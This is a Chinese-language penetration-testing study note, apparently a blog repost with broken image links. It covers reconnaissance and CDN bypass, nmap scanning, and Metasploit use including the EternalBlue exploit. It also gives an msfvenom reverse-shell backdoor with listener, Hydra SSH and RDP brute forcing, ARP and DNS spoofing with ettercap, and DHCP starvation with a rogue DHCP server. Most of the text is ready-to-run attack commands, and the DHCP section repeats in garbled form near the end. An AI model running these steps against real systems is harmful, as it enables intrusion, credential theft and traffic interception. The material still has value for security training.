子域名信息搜集方法
搜索引擎-google hacking
例如:site:baidu.com
第三方网站查询
dnsdumpster.com
tool.chinaz.com/subdomain
网络空间搜索引擎
钟馗之眼
SSL证书查询
crt.sh
developers.facebook.com/tools/ct/search
工具
laya和OneForAll
IP信息收集
IP地址反查域名
旁注:因为一台物理服务器上面可能运行多个虚拟主机。这些虚拟主机有不同域名,但是通常公用同一个IP地址。如果知道有哪些网站共用这台服务器,就可能通过此台服务器上的其他网站的漏洞获取服务器控制权,进而迂回获取生头目标的权限。
站长之家同IP查询
CDN
CDN的全称是Content Delivery Network,即内容分发网络。CDN是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。CDN的关键技术主要有内容存储和分发技术
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-l6Z1XlPz-1627481311249)(image-20210122173546995.png)]
判断CDN
多地ping:站长之家:ping.chinaz.com
绕过CDN
方法一:国外访问->cdn服务贵,可能不在境外使用
asm.ca.com/en/ping.php
www.wepcc.com
www.uptrends.com/tools/ping-test
方法二:查询子域名的IP
ip.tool.chinaz.com/ipbatch
方法三:Mx记录邮件服务->邮件服务查询ip地址
显示邮件原文
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6N7JUrbl-1627481311251)(image-20210122191241922.png)]
方法四:历史DNS记录->查询域名最早解析的IP地址
securitytrails.com
viewdns.info/iphistory
www.ip138.com
端口信息收集
nmap端口扫描工具
基础扫描开放端口信息命令
nmap -A -T4 192.168.1.1
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-677ltZpq-1627481311254)(image-20210122194316843.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5sKg5QJf-1627481311257)(image-20210122194341470.png)]
扫描全端口命令
nmap -sS -v -T4 -Pn -p 0-65535 192.168.1.0/24
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-HC9oIZ9P-1627481311258)(image-20210122194517443.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-NfdJRAOn-1627481311259)(image-20210122194751609.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-OAq4lsX0-1627481311263)(image-20210122195548390.png)]
Metasploit
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-jYBrTtXS-1627481311266)(image-20210122203038908.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MwkAlK7e-1627481311268)(image-20210122203815153.png)]
如何启动Metasploit
其使用的是postgresq数据库
kali命令:
msfdb init :初始化数据库
msfconsole:启动
db_status:查看是否成功连接数据库
workspace :查看工作区
workspace -a 工作区名字//创建工作区
使用步骤:
1、使用kali再命令行中初始化数据库
2、进入msfconsole,直接输入启动
3、之后输入msf5相关的命令,如下图
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4MJjXjkg-1627481311271)(image-20210122211216916.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-8PhLF5Yu-1627481311272)(image-20210130220007171.png)]
使用db_nmap命令
db_nmap -sS -T4 IP地址(全网段扫描)
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BpbH5555-1627481311273)(image-20210122211351348.png)]
输入hosts,查看当前网段存活情况
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-q4rUUvZo-1627481311274)(image-20210122212055024.png)]
输入services,查看扫描的结果
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tIAA6tCc-1627481311278)(image-20210122212219595.png)]
扫描是否有常见的漏洞
db_namp --script=vuln IP地址,扫描是否有常见的漏洞
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uorC89yE-1627481311281)(image-20210130220718312.png)]
如何使用辅助模块扫描端口
auxiliary是辅助模块
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TcVFZ7CV-1627481311283)(image-20210122212904886.png)]
use +模块名 按两次Tab补全
当不知道使用什么模块的时候,search + 需要执行的操作(例如端口扫描portscan)
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gNhuM9nv-1627481311284)(image-20210122212814365.png)]
使用模块是需要对模块进行配置
show options查看配置信息
需要扫描端口则需要指定IP地址:需要指定RHOSTS
set rhosts IP地址,指定扫描端口的IP地址
run,运行,执行端口扫描
介绍永恒之蓝漏洞,广泛存在于win7,win server,早期的win10
search ms17_010,查找于之相关的模块
auxiliary辅助模块
exploit攻击模块
use auxiliary/scanner/smb/smb_ms17_101
show options,查看配置信息
set rhosts IP地址
run
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3VGdG6ml-1627481311285)(image-20210122220414184.png)]
use exploit/windows/smb/ms17_010_eternalblue
show options,查看配置信息
set rhosts IP地址
run
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-CZneyE83-1627481311287)(image-20210122220708303.png)]
当在进入session中时,利用cmd造成的乱码时,切换标签页,chcp 65001,变成英文,改编码
background,放入后台
session,查看会话
session id,进入cmd
shell转meterpreter,提权
session -u (id)
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-C6HQoQ0b-1627481311289)(image-20210122211722332.png)]
Msfvenom是msfpayload和msfencode的组合。将这两个工具集成在一个框架实例中。
Msfvenom是用来生成后门的软件,在目标机上执行后门,在本地监听上线。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-p1AK76FD-1627481311290)(image-20210122222250540.png)]
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XpPp6Uhe-1627481311291)(image-20210122223113591.png)]
msfvenom -p windows/meterpreter/reverse_tcp lhost=本机的IP地址 lport=本机的端口 -f(生成什么格式的木马) exe -o(输出的文件名) 木马文件名
开启端口,木马监听
use exploit/multi/handler,开启监听端口
show options,配置
set payload windows/meterpreter/reverse_tcp
show options,显示配置
set lhost 本机IP地址
set lport 本机端口
run
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-VjOVRalY-1627481311293)(image-20210122225509191.png)]
弱口令密码爆破
cewl制作字典
cewl -d 2 -m 5 -w word.txt https://hetianlab.com
获取字典的网站
www.bugku.com/mima
github.com/TheKingOfDuck/fuzzDicts
github.com/fuzzdb-project/fuzzdb
Hydra爆破SSH
hydra -l root -p root 127.0.0.1 -s 2222 ssh -f
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IQlleX1r-1627481311297)(image-20210126145946509.png)]
利用msfconsole模块
use auxiliary/scanner/ssh/ssh_login
show options
set rhosts IP地址
set rport 端口
set pass_file 字典文件位置
set threads 10 //线程
run
Hydra爆破RDP (远程连接)
hydra -l administrator -P /usr/share/wordlists/metasploit/burnett_top_500.txt 192.168.2.106 rdp
利用Sqlmap进行SQL注入
sqlmap常用选项
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-amEftLuO-1627481311298)(image-20210126161055503.png)]
远程登录对方桌面
rdesktop -u liuyi -p 123456 192.168.111.128
ARP欺骗
扫描当前局域网中的所有设备
1、nbtscan -r 192.168.111.0/24
2、arp-scan 192.168.111.1-192.168.111.254
执行ARP欺骗命令:(截流断网)
arpspoof -i eth0 -t 192.168.111.128 192.168.111.2
(目标IP) (目标网关)
开启路由功能进行抓包:
第一种方法:echo 0 > /proc/sys/net/ipv4/ip_forward // 0表示只存储不转发,1表示存储转发
第二种方法:进入/etc/sysctl.conf,将net.ipv4.ip_forward更改
利用谷歌浏览器找登录界面:
inurl:login
抓包命令:
ettercap -Tq -i eth0
在window中利用arp -a 查看是否存在相同的mac地址,若存在则遭受ARP攻击,并利用arp -d 看看能否上网。
arp -s IP地址 mac地址 //绑定mac和ip来防止ARP攻击
DNS欺骗
修改域名IP解析记录
vim /etc/ettercap/etter.dns
在文件后面加上
*.hetianlab.com A 192.168.78.1
ettercap -G //图形化界面
点击菜单,选择Plugins>Manger plugins>dns_spoof>右键启动
DHCP地址耗尽攻击
1、安装yersinia,耗尽DHCP服务器的IP
yersinia -G
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-viWjV4qB-1627481311299)(image-20210128112244673.png)][外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qATr6vfh-1627481311301)(image-20210128112307264.png)]
2、搭建DHCP服务器
apt-get install isc-dhcp-server
vim /etc/dhcp/dhcpd.conf
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Fpuh3Idl-1627481311302)(image-20210128114320885.png)]
开启DHCP服务
dhcpd -cf /etc/dhcp/dhcpd.conf //报错
touch /var/lib/dhcp/dhcpd.leases
开启DHCP服务//冒充DHCP服务器
抓取指定接口数据流上面的图片
driftnet
-viWjV4qB-1627481311299)][外链图片转存中…(img-qATr6vfh-1627481311301)]
2、搭建DHCP服务器
apt-get install isc-dhcp-server
vim /etc/dhcp/dhcpd.conf
[外链图片转存中…(img-Fpuh3Idl-1627481311302)]
开启DHCP服务
dhcpd -cf /etc/dhcp/dhcpd.conf //报错
touch /var/lib/dhcp/dhcpd.leases
开启DHCP服务//冒充DHCP服务器
抓取指定接口数据流上面的图片
driftnet
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lgc8RJal-1627481311303)(image-20210130214801347.png)]